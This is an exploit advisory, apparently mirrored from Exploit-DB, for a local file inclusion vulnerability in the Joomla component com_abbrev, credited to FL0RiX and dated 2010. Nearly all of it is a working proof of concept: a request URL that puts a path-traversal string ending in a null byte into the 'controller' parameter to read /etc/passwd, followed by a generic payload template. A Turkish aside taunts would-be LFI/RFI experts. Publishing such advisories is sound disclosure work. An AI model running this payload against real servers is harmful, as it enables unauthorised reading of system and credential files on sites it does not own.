Joomla! Component com_abbrev – Local File Inclusion - 体验盒子

作者： FL0RiX

日期： 2010-01-03

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/10948/

<------------------- header data start ------------------- >

[++] Joomla Component com_abbrev Local File Inclusion Vulnerability


[++] author: FL0RiX

[++] Name : com_abbrev

[++] Bug Type : Local File Inclusion

[++] Demo Vuln. :


[++] http://server/index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00

[++] Note : LFI/RFI Uzman&#305; Zannedenler Localda Aramazlar :)

< ------------------- header data end of ------------------- >

< -- bug code start -- >

path/index.php?option=com_abbrev&controller=[-LFI-]

< -- bug code end of -- >